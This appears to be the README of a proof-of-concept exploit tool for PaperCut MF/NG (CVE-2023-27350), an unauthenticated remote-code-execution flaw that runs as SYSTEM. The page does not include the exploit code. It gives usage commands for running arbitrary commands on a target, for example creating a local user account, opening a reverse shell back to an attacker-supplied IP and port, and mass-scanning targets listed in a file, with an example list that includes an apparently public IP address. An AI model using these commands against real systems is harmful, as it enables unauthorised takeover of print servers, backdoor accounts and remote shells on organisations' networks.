CVE-2023-27350 PoC — PaperCut NG 访问控制错误漏洞

Description

Exploit for Papercut CVE-2023-27350. [+] Reverse shell [+] Mass checking

Readme

<div class="markdown prose w-full break-words dark:prose-invert light"><h1>CVE-2023-27350 Exploit POC</h1><p>This is a Proof of Concept (POC) exploit for CVE-2023-27350, a vulnerability found in PaperCut MF/NG that allows an unauthenticated attacker to execute arbitrary code with SYSTEM privileges.</p><h2>Requirements</h2><p>Before using this exploit, make sure you have installed the following libraries:</p><pre><div class="bg-black rounded-md mb-4"><div class="flex items-center relative text-gray-200 bg-gray-800 px-4 py-2 text-xs font-sans justify-between rounded-t-md"><button class="flex ml-auto gap-2"><svg stroke="currentColor" fill="none" stroke-width="2" viewBox="0 0 24 24" stroke-linecap="round" stroke-linejoin="round" class="h-4 w-4" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M16 4h2a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H6a2 2 0 0 1-2-2V6a2 2 0 0 1 2-2h2"></path><rect x="8" y="2" width="8" height="4" rx="1" ry="1"></rect></svg></button></div><div class="p-4 overflow-y-auto"><code class="!whitespace-pre hljs">pip install -r requirements.txt
</code></div></div></pre><h2>Usage</h2><pre><div class="bg-black rounded-md mb-4"><div class="flex items-center relative text-gray-200 bg-gray-800 px-4 py-2 text-xs font-sans justify-between rounded-t-md"><span></span><button class="flex ml-auto gap-2"><svg stroke="currentColor" fill="none" stroke-width="2" viewBox="0 0 24 24" stroke-linecap="round" stroke-linejoin="round" class="h-4 w-4" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M16 4h2a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H6a2 2 0 0 1-2-2V6a2 2 0 0 1 2-2h2"></path><rect x="8" y="2" width="8" height="4" rx="1" ry="1"></rect></svg></button></div><div class="p-4 overflow-y-auto"><code class="!whitespace-pre hljs language-php-template"><span class="xml">python CVE-2023-27350.py -u <span class="hljs-tag">&lt;<span class="hljs-name">target</span> <span class="hljs-attr">url</span>&gt;</span> [-c <span class="hljs-tag">&lt;<span class="hljs-name">command</span>&gt;</span> | --reverse-shell | -f <span class="hljs-tag">&lt;<span class="hljs-name">file</span>&gt;</span>]
</span></code></div></div></pre><h3>Options</h3><ul><li><code>-u</code>, <code>--url</code>: The URL of the target PaperCut MF/NG application (e.g., <code>http://target-ip:9191</code>).</li><li><code>-c</code>, <code>--command</code>: The command to execute on the target system.</li><li><code>--reverse-shell</code>: Use a reverse shell payload to execute commands on the target system.</li><li><code>-f</code>, <code>--file</code>: Check multiple targets from a file (e.g., <code>file.txt</code>).</li></ul><h3>Example</h3><h4>Execute Command</h4><p>To execute a command on the target system, use the <code>-c</code> option:</p><pre><div class="bg-black rounded-md mb-4"><div class="flex items-center relative text-gray-200 bg-gray-800 px-4 py-2 text-xs font-sans justify-between rounded-t-md"><span></span><button class="flex ml-auto gap-2"><svg stroke="currentColor" fill="none" stroke-width="2" viewBox="0 0 24 24" stroke-linecap="round" stroke-linejoin="round" class="h-4 w-4" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M16 4h2a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H6a2 2 0 0 1-2-2V6a2 2 0 0 1 2-2h2"></path><rect x="8" y="2" width="8" height="4" rx="1" ry="1"></rect></svg></button></div><div class="p-4 overflow-y-auto"><code class="!whitespace-pre hljs language-python">python CVE-2023-27350.py -u http://target-ip:9191 -c <span class="hljs-string">"net user test test1234 /add"</span>
</code></div></div></pre><h4>Reverse Shell</h4><p>To use a reverse shell payload to execute commands on the target system, use the <code>--reverse-shell</code> option. You will be prompted to enter your IP address and port number:</p><pre><div class="bg-black rounded-md mb-4"><div class="flex items-center relative text-gray-200 bg-gray-800 px-4 py-2 text-xs font-sans justify-between rounded-t-md"><span></span><button class="flex ml-auto gap-2"><svg stroke="currentColor" fill="none" stroke-width="2" viewBox="0 0 24 24" stroke-linecap="round" stroke-linejoin="round" class="h-4 w-4" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M16 4h2a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H6a2 2 0 0 1-2-2V6a2 2 0 0 1 2-2h2"></path><rect x="8" y="2" width="8" height="4" rx="1" ry="1"></rect></svg></button></div><div class="p-4 overflow-y-auto"><code class="!whitespace-pre hljs language-less"><span class="hljs-selector-tag">python</span> <span class="hljs-selector-tag">exploit</span><span class="hljs-selector-class">.py</span> <span class="hljs-selector-tag">-u</span> <span class="hljs-selector-tag">http</span>:<span class="hljs-comment">//target-ip:9191 --reverse-shell</span>
<span class="hljs-selector-tag">Enter</span> <span class="hljs-selector-tag">your</span> <span class="hljs-selector-tag">IP</span> <span class="hljs-selector-tag">address</span>: &lt;<span class="hljs-selector-tag">attacker-ip</span>&gt;
<span class="hljs-selector-tag">Enter</span> <span class="hljs-selector-tag">your</span> <span class="hljs-selector-tag">port</span> <span class="hljs-selector-tag">number</span>: &lt;<span class="hljs-selector-tag">port</span>&gt;
</code></div></div></pre><h4>Mass Checking</h4><p>To check multiple targets from a file, use the <code>-f</code> option. The format of the file should be <code>ip_address:port</code>:</p><pre><div class="bg-black rounded-md mb-4"><div class="flex items-center relative text-gray-200 bg-gray-800 px-4 py-2 text-xs font-sans justify-between rounded-t-md"><button class="flex ml-auto gap-2"><svg stroke="currentColor" fill="none" stroke-width="2" viewBox="0 0 24 24" stroke-linecap="round" stroke-linejoin="round" class="h-4 w-4" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M16 4h2a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H6a2 2 0 0 1-2-2V6a2 2 0 0 1 2-2h2"></path><rect x="8" y="2" width="8" height="4" rx="1" ry="1"></rect></svg></button></div><div class="p-4 overflow-y-auto"><code class="!whitespace-pre hljs">python CVE-2023-27350.py -f file.txt
</code></div></div></pre>
<h4>Formatting the <code>file.txt</code></h4>
<p>When using the mass checking option with the <code>file.txt</code> input, make sure that the contents of the file are formatted correctly.</p><p>Each line of the file should contain the IP address and port number of a target, separated by a colon <code>:</code>. For example:</p><pre><div class="bg-black rounded-md mb-4"><div class="flex items-center relative text-gray-200 bg-gray-800 px-4 py-2 text-xs font-sans justify-between rounded-t-md"><span></span><button class="flex ml-auto gap-2"><svg stroke="currentColor" fill="none" stroke-width="2" viewBox="0 0 24 24" stroke-linecap="round" stroke-linejoin="round" class="h-4 w-4" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M16 4h2a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H6a2 2 0 0 1-2-2V6a2 2 0 0 1 2-2h2"></path><rect x="8" y="2" width="8" height="4" rx="1" ry="1"></rect></svg></button></div><div class="p-4 overflow-y-auto"><code class="!whitespace-pre hljs language-"><span class="hljs-section">110.175.19.78:9191</span>
<span class="hljs-section">110.175.19.78:80</span>
<span class="hljs-section">192.168.1.1:8080</span>
</code></div></div></pre><p>Make sure there are no extra spaces or characters in between the IP address, colon, and port number. Also, make sure that each line only contains one IP address and port number.</p></div>
<h3>Credits</h3><p>This is a forked version of the <a href="https://github.com/horizon3ai/CVE-2023-27350" target="_new">horizon3ai/CVE-2023-27350</a> repository. All credits for the original exploit go to the authors.</p></div>
<div class="markdown prose w-full break-words dark:prose-invert light">

File Snapshot

Remarks